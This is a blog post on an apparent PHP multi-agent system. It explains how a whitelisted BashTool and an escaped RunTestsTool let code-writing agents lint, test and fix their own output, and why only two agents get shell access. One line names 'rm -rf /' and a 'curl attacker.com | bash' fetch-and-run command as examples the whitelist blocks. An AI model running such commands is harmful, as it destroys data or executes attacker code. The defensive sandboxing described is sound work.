AI Agents 20.02.2026 1 views

BashTool and RunTestsTool: Self-Check Loops for Code-Writing Agents

Why only VajbCoder and TestAgent get shell access — BashTool's allowed command whitelist (php -l, phpunit, phpstan), RunTestsTool for targeted PHPUnit execution, and the write-lint-test-fix self-check loop that catches errors before human review.

Code-writing agents have a unique problem: how do you know the code you just wrote actually works? You can't just generate code and hope — the AI needs to check its own output. BashTool and RunTestsTool make this possible.

BashTool: Whitelisted Shell Access

BashTool allows command execution, but only specific commands:

private const ALLOWED_COMMANDS = [
    'php -l',           // Syntax check
    'php -r',           // Quick PHP execution
    'phpunit',          // Test execution
    'phpstan',          // Static analysis
    'composer',         // Dependency info (not install)
    'git diff',         // See changes
    'git status',       // Check state
    'git log',          // History
];

Every command is checked against this whitelist before execution. An agent can't run rm -rf / or curl attacker.com | bash. It can only lint, test, analyze, and inspect.

Who Gets BashTool

Only VajbCoder and TestAgent. Not ReviewAgent (read-only). Not DocAgent (no need to run commands). Not KIK (orchestrator, not executor).

The reasoning: VajbCoder writes code and needs to verify it compiles. TestAgent writes tests and needs to run them. Other agents don't generate executable artifacts.

The Write-Lint-Test-Fix Loop

VajbCoder's typical iteration pattern:

Iteration 1: Read existing code → understand structure
Iteration 2: Write new code via write_file
Iteration 3: php -l newfile.php → syntax check
             If error: read error, fix code, go to step 2
Iteration 4: phpunit --filter NewFeatureTest → run tests
             If fail: read failure, fix code, go to step 2
Iteration 5: phpstan analyze newfile.php → static analysis
             If errors: fix type hints, go to step 2
Iteration 6: generate_patch (or confirm done) → auto-exit

The self-check loop catches three categories of errors:

Syntax errors — php -l catches missing semicolons, unmatched braces

Logic errors — phpunit catches wrong behavior, broken assertions

Type errors — phpstan catches missing type hints, null safety issues

Without this loop, the agent would generate code in one shot and hand it off. With the loop, the agent iterates until the code passes all checks — or runs out of iterations.

RunTestsTool

A specialized tool for TestAgent:

public function execute(array $params): array
{
    $testFile = $params['file'] ?? null;     // Specific test file
    $filter = $params['filter'] ?? null;     // --filter pattern
    $suite = $params['suite'] ?? null;       // --testsuite name

    $command = 'php vendor/bin/phpunit';
    if ($testFile !== null) $command .= ' ' . escapeshellarg($testFile);
    if ($filter !== null) $command .= ' --filter ' . escapeshellarg($filter);
    if ($suite !== null) $command .= ' --testsuite ' . escapeshellarg($suite);

    // Execute with timeout
    $output = $this->executeWithTimeout($command, 120);

    return ['success' => $this->parseSuccess($output), 'content' => $output];
}

Parameters are escaped with escapeshellarg() — no command injection through test file names or filter patterns.

TestAgent's Loop

Iteration 1: Read source code to understand what to test
Iteration 2: Read existing tests for patterns
Iteration 3: Write test file via write_file (tests/ only)
Iteration 4: run_tests(file: 'tests/Unit/NewTest.php')
             If fail: read output, fix test, rewrite
Iteration 5: run_tests(filter: 'NewTest') → confirm pass

TestAgent's WriteFileTool is restricted to tests/ — it can't accidentally modify production code while fixing a test failure.

Command Timeout

Both tools enforce execution timeouts:

private function executeWithTimeout(string $command, int $timeoutSeconds): string
{
    $process = proc_open($command, $descriptors, $pipes);
    // ... read output with timeout ...
    if ($elapsedSeconds > $timeoutSeconds) {
        proc_terminate($process);
        return "Command timed out after {$timeoutSeconds}s";
    }
}

Default timeout: 120 seconds. Long enough for a full PHPUnit suite, short enough to prevent infinite loops.

Why Not Give Every Agent BashTool

Shell access is the most powerful tool. An agent with BashTool can:

Read any file (via cat)

List directories (via ls)

Check git history (via git log)

Run arbitrary PHP (via php -r)

Even with a whitelist, it's more capability than most agents need. ReviewAgent only needs to read — giving it BashTool would be capability bloat that increases attack surface without benefit.

The principle: every agent gets the minimum tools for its job. VajbCoder needs to lint and test its output → BashTool. ReviewAgent needs to read code → ReadFileTool. KIK needs to delegate → DelegateAgentTool.

Up Next

Next up: ManageScheduleTool and SharedContextTool: Scheduling and Cross-Run Memory — how KIK manages scheduled agent runs via natural language, and how agents persist knowledge across executions.

BashTool and RunTestsTool: Self-Check Loops for Code-Writing Agents

BashTool: Whitelisted Shell Access

Who Gets BashTool

The Write-Lint-Test-Fix Loop

RunTestsTool

TestAgent's Loop

Command Timeout

Why Not Give Every Agent BashTool

Up Next

Comments (0)

Leave a Comment

Recent Posts

The Full Picture: Why This Is Just the Beginning

Security, Token Economics, and Observability in an Agentic System

Why No LangChain: Building a Multi-Agent Runtime in PHP

The Git Healer Flow: LUKA Detects, LukAgent Writes, Git Isolates, Human Approves

"Scheduler → Agent → Approval: Autonomous Runs With Human Checkpoints"